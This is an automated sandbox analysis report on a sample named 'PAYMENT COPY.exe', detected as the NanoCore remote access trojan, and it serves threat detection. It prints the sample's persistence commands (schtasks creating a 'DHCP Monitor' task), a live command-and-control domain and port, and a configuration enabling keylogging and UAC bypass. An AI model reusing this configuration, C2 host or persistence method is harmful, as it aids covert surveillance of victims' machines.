Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PAYMENT COPY.exe

Overview

General Information

Sample Name:PAYMENT COPY.exe
Analysis ID:356453
MD5:53e8c460446fe305dfc2159961aa6234
SHA1:bbebce3965dfc237eac2711a47c141a4f8ff0083
SHA256:b082aa828dd2eb42d6e1de8ccd8573ac3096ceee92ad26449fc1df6e490ff4ed
Tags:exeNanoCoreRATSCB

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PAYMENT COPY.exe (PID: 6392 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: 53E8C460446FE305DFC2159961AA6234)
    • PAYMENT COPY.exe (PID: 6432 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: 53E8C460446FE305DFC2159961AA6234)
      • schtasks.exe (PID: 6532 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6596 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpF23B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • PAYMENT COPY.exe (PID: 6612 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' 0 MD5: 53E8C460446FE305DFC2159961AA6234)
    • PAYMENT COPY.exe (PID: 6712 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' 0 MD5: 53E8C460446FE305DFC2159961AA6234)
  • dhcpmon.exe (PID: 6744 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 53E8C460446FE305DFC2159961AA6234)
  • dhcpmon.exe (PID: 5932 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 53E8C460446FE305DFC2159961AA6234)
    • dhcpmon.exe (PID: 2896 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 53E8C460446FE305DFC2159961AA6234)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "bed38ea9-13ae-4999-bfd6-9ec5f9de3405", "Group": "Default", "Domain1": "chinomso.duckdns.org", "Domain2": "chinomso.duckdns.org", "Port": 7688, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "chinomso.duckdns.org", "BackupDNSServer": "chinomso.duckdns.orgAMC9Avo9uFWUE1JbxpU=", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x29615:$x1: NanoCore.ClientPluginHost
  • 0x29652:$x2: IClientNetworkHost
  • 0x2d185:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x2738:$a: NanoCore
    • 0x2937d:$a: NanoCore
    • 0x2938d:$a: NanoCore
    • 0x295c1:$a: NanoCore
    • 0x295d5:$a: NanoCore
    • 0x29615:$a: NanoCore
    • 0x293dc:$b: ClientPlugin
    • 0x295de:$b: ClientPlugin
    • 0x2961e:$b: ClientPlugin
    • 0x5fe50:$b: ClientPlugin
    • 0x79f06:$b: ClientPlugin
    • 0x29503:$c: ProjectData
    • 0x29f0a:$d: DESCrypto
    • 0x318d6:$e: KeepAlive
    • 0x2f8c4:$g: LogClientMessage
    • 0x2babf:$i: get_Connected
    • 0x2a240:$j: #=q
    • 0x2a270:$j: #=q
    • 0x2a28c:$j: #=q
    • 0x2a2bc:$j: #=q
    • 0x2a2d8:$j: #=q
    00000001.00000002.500337236.0000000000730000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x350b:$x1: NanoCore.ClientPluginHost
    • 0x3525:$x2: IClientNetworkHost
    00000001.00000002.500337236.0000000000730000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x350b:$x2: NanoCore.ClientPluginHost
    • 0x52b6:$s4: PipeCreated
    • 0x34f8:$s5: IClientLoggingHost
    Click to see the 113 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    1.2.PAYMENT COPY.exe.780000.16.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x5fee:$x1: NanoCore.ClientPluginHost
    • 0x602b:$x2: IClientNetworkHost
    1.2.PAYMENT COPY.exe.780000.16.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x5fee:$x2: NanoCore.ClientPluginHost
    • 0x9441:$s4: PipeCreated
    • 0x6018:$s5: IClientLoggingHost
    1.2.PAYMENT COPY.exe.27b2a64.22.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1deb:$x1: NanoCore.ClientPluginHost
    • 0x1e24:$x2: IClientNetworkHost
    1.2.PAYMENT COPY.exe.27b2a64.22.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x1deb:$x2: NanoCore.ClientPluginHost
    • 0x1f36:$s4: PipeCreated
    • 0x1e05:$s5: IClientLoggingHost
    1.2.PAYMENT COPY.exe.400000.1.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x251e5:$x1: NanoCore.ClientPluginHost
    • 0x25222:$x2: IClientNetworkHost
    • 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 337 entries

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PAYMENT COPY.exe, ProcessId: 6432, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
    Sigma detected: Scheduled temp file as task from temp locationShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\PAYMENT COPY.exe' , ParentImage: C:\Users\user\Desktop\PAYMENT COPY.exe, ParentProcessId: 6432, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp', ProcessId: 6532

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000008.00000002.278420831.0000000002460000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "bed38ea9-13ae-4999-bfd6-9ec5f9de3405", "Group": "Default", "Domain1": "chinomso.duckdns.org", "Domain2": "chinomso.duckdns.org", "Port": 7688, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "chinomso.duckdns.org", "BackupDNSServer": "chinomso.duckdns.orgAMC9Avo9uFWUE1JbxpU=", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
    Multi AV Scanner detection for domain / URLShow sources
    Source: chinomso.duckdns.orgVirustotal: Detection: 8%Perma Link
    Source: chinomso.duckdns.orgVirustotal: Detection: 8%Perma Link
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Temp\ri8clfcgml62un.dllReversingLabs: Detection: 14%
    Multi AV Scanner detection for submitted fileShow sources
    Source: PAYMENT COPY.exeReversingLabs: Detection: 35%
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.505736368.000000000341C000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298702640.00000000032CC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278355916.0000000002411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.501309782.0000000002391000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298587099.0000000002291000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6712, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6432, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 2896, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6612, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6392, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5932, type: MEMORY
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.3430821.25.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.342c1f8.24.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.342c1f8.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3497815.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.34931ec.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.34931ec.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3317815.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.33131ec.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.33131ec.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPE
    Machine Learning detection for dropped fileShow sources
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
    Machine Learning detection for sampleShow sources
    Source: PAYMENT COPY.exeJoe Sandbox ML: detected
    Source: 1.2.PAYMENT COPY.exe.342c1f8.24.unpackAvira: Label: TR/NanoCore.fadte
    Source: 15.2.dhcpmon.exe.4e30000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 8.1.PAYMENT COPY.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 15.1.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 15.2.dhcpmon.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 1.2.PAYMENT COPY.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 1.1.PAYMENT COPY.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 8.2.PAYMENT COPY.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7

    Compliance:

    barindex
    Detected unpacking (overwrites its own PE header)Show sources
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeUnpacked PE file: 1.2.PAYMENT COPY.exe.400000.1.unpack
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeUnpacked PE file: 8.2.PAYMENT COPY.exe.400000.0.unpack
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 15.2.dhcpmon.exe.400000.1.unpack
    Uses 32bit PE filesShow sources
    Source: PAYMENT COPY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
    Source: PAYMENT COPY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Binary contains paths to debug symbolsShow sources
    Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000000.00000003.237791410.0000000002B20000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000007.00000003.251492752.0000000002C40000.00000004.00000001.sdmp, dhcpmon.exe, 0000000E.00000003.274760299.0000000002C30000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, 00000000.00000003.237791410.0000000002B20000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000007.00000003.251492752.0000000002C40000.00000004.00000001.sdmp, dhcpmon.exe, 0000000E.00000003.274760299.0000000002C30000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: PAYMENT COPY.exe, 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp
    Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp
    Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: PAYMENT COPY.exe, 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmp
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A15
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_004065C1 FindFirstFileA,FindClose,0_2_004065C1
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00404A29 FindFirstFileExW,1_2_00404A29
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_00404A29 FindFirstFileExW,1_1_00404A29
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_00404A29 FindFirstFileExW,8_2_00404A29
